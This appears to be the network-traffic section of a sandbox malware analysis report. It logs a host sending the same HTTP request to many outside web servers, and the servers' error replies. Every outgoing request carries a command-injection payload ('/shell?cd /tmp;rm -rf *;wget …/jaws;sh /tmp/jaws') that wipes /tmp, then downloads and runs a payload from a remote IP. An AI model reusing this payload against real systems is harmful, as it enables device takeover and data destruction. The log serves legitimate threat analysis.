                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 73 68 65 6c 6c 3f 63 64 20 26 23 78 32 46 3b 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget </span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            94192.168.2.2356648107.172.253.17580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.762470961 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:26.893065929 CET1286INHTTP/1.1 400 Bad Request
                                                            Server: squid
                                                            Mime-Version: 1.0
                                                            Date: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3252
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            X-Cache: MISS from serv
                                                            X-Cache-Lookup: NONE from serv:8800
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;w
                                                            Jan 26, 2024 15:31:26.893083096 CET1286INData Raw: 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62
                                                            Data Ascii: idth:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}/* General text */p {}/* error brief description */#error p {}/* some data which may have caused the problem */#data {}/* the
                                                            Jan 26, 2024 15:31:26.893104076 CET1022INData Raw: 68 2b 2f 74 6d 70 2f 6a 61 77 73 22 3e 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 3c 2f 61 3e 3c 2f 70 3e
                                                            Data Ascii: h+/tmp/jaws">/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws</a></p><blockquote id="error"><p><b>Invalid URL</b></p></blockquote><p>Some aspect of the requested URL is incorrect.</p><p>Some possible problems are:</p><ul>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            95192.168.2.2347744184.24.204.4880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.778441906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:26.939841986 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 62 36 32 32 63 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 36 26 23 34 36 3b 33 34 39 30 32 39 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;6b622c17&#46;1706279486&#46;3490292</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            96192.168.2.2352530178.16.125.7880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.836533070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.055377007 CET326INHTTP/1.1 502 Bad Gateway
                                                            Server: nginx/1.20.2
                                                            Date: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            97192.168.2.2359922201.28.145.11480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.850722075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            98192.168.2.23602122.23.6.5080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.851705074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.071361065 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 32 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 36 26 23 34 36 3b 32 35 36 35 35 62 32 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;b27a7b5c&#46;1706279486&#46;25655b2a</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            99192.168.2.2345362212.76.114.21280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.866787910 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            100192.168.2.2355902117.20.106.5780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.892258883 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.167643070 CET427INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Server: Apache
                                                            Vary: Accept-Encoding
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            101192.168.2.233893823.13.20.12380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.930377007 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.081584930 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 61 62 35 33 62 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 37 26 23 34 36 3b 64 35 36 64 30 38 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;4ab53b17&#46;1706279487&#46;d56d080</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            102192.168.2.2338388162.14.101.3380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.997595072 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.375034094 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            103192.168.2.234850649.40.48.5280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.006278038 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.395062923 CET173INHTTP/1.1 400 Bad Request
                                                            Content-Length: 54
                                                            Connection: close
                                                            Cache-Control: no-cache,no-store
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 62 3e 48 74 74 70 2f 31 2e 31 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 62 3e 3c 2f 62 6f 64 79 3e 20 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><body><b>Http/1.1 Bad Request</b></body> </html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            104192.168.2.233396454.195.88.16880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.050987959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.265088081 CET558INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:27 GMT
                                                            Server: Apache/2.4.57 (AlmaLinux) OpenSSL/3.0.7 mod_auth_gssapi/1.6.3 mod_wsgi/4.7.1 Python/3.9
                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            105192.168.2.2347844121.189.159.880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.210827112 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.492950916 CET35INHTTP/1.0 301 Redirect
                                                            Jan 26, 2024 15:31:27.494048119 CET395INData Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 46 72 69 20 4a 61 6e 20 32 36 20 32 33 3a 33 31 3a 33 30 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                            Data Ascii: Server: GoAhead-WebsDate: Fri Jan 26 23:31:30 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:80/login.asp<html><head></head><body>This document has moved to a


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            106192.168.2.2360758154.93.247.23180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.233231068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            107192.168.2.2356360117.51.135.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:27.355741024 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:27.815946102 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
